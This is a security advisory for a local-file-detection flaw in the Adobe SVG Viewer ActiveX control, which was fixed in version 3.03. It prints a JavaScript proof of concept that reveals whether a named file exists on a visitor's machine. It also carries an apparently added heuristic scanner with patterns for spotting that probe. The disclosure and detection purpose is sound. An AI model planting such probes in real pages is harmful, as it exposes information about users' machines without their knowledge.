Adobe SVG Viewer ActiveX Control SRC Information Disclosure Vulnerability
BID:13490
Info
| Bugtraq ID: | 13490 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 04 2005 12:00AM |
| Updated: | May 04 2005 12:00AM |
| Credit: | Discovered by Robert Fly. |
| Vulnerable: | Adobe SVG Viewer 3.0 2; Adobe SVG Viewer 3.0 1; Adobe SVG Viewer 3.0 |
| Not Vulnerable: | Adobe SVG Viewer 3.0 3 |
Discussion
The Adobe SVG Viewer ActiveX control is prone to an information disclosure vulnerability. Reports indicate that the Adobe SVG Viewer ActiveX control may be employed to disclose the existence of a target file.
Information that is harvested by leveraging this vulnerability may be used to aid in further attacks.
This vulnerability affects Adobe SVG Viewer version 3.02 and earlier.
Exploit / POC
The following proof of concept is available:
Sample JavaScript:

    function load(filename)
    {
        // foo is a reference to the SVG ActiveX control; filename is the
        // filename you're looking for
        foo.src = filename;
        // check the load state after five seconds
        setTimeout("loading()", 5000);
    }

    function loading()
    {
        if (document.readyState != 'complete')
        {
            alert('File does not exist.');
        }
        else
        {
            alert('File exists.');
        }
        window.location.reload(false);
    }
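A heuristic content check for the structure of this proof of concept (script assigns a control's `src`, schedules a timer, then branches on `readyState`), given here as an added example that is not part of the advisory. The function name `scanScript`, the result fields and the benign sample are hypothetical and constructed for illustration; the check is a triage aid for reviewing page script and will produce false positives and negatives.

```javascript
// Added example (not from the advisory): heuristic scan of page script for the
// probe structure in the proof of concept. All names here are hypothetical.

// Script-driven assignment to some object's .src property (not == or ===).
const SRC_ASSIGN = /\b([A-Za-z_$][\w$]*)\.src\s*=(?!=)/g;
// A timer that gives the load a fixed window to finish.
const TIMER = /\bset(?:Timeout|Interval)\s*\(/;
// A branch whose condition reads readyState, i.e. the load outcome is observed.
const READY_BRANCH = /\bif\s*\([^)]*\breadyState\b[^)]*\)/;

function scanScript(scriptText) {
  const targets = [...scriptText.matchAll(SRC_ASSIGN)].map((m) => m[1]);
  const usesTimer = TIMER.test(scriptText);
  const branchesOnReadyState = READY_BRANCH.test(scriptText);
  return {
    srcTargets: [...new Set(targets)],
    usesTimer,
    branchesOnReadyState,
    // Flag only when all three parts of the PoC's structure are present.
    suspicious: targets.length > 0 && usesTimer && branchesOnReadyState,
  };
}

// Constructed sample 1: the advisory's PoC, held as inert text to scan.
const POC_SAMPLE = `
function load(filename) {
  foo.src = filename;
  setTimeout("loading()", 5000);
}
function loading() {
  if (document.readyState != 'complete') { alert('File does not exist.'); }
  else { alert('File exists.'); }
  window.location.reload(false);
}`;

// Constructed sample 2: ordinary image preloading, which only assigns .src.
const BENIGN_SAMPLE = `
var img = new Image();
img.onload = function () { gallery.appendChild(img); };
img.src = "/images/banner.png";`;

function demo() {
  return [scanScript(POC_SAMPLE), scanScript(BENIGN_SAMPLE)];
}
console.log(demo());
```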
Solution / Fix
Solution:
This issue has been addressed in Adobe SVG Viewer 3.03.
- Adobe SVG Viewer 3.0 1: Adobe SVG Viewer 3.03, http://www.adobe.com/svg/viewer/install/mainframed.html
- Adobe SVG Viewer 3.0 2: Adobe SVG Viewer 3.03, http://www.adobe.com/svg/viewer/install/mainframed.html
- Adobe SVG Viewer 3.0: Adobe SVG Viewer 3.03, http://www.adobe.com/svg/viewer/install/mainframed.html
References
- Adobe Homepage (Adobe)
- SVG Zone (Adobe)
- Local file detection bug found through Adobe SVG Viewer ("Hyperdose Security")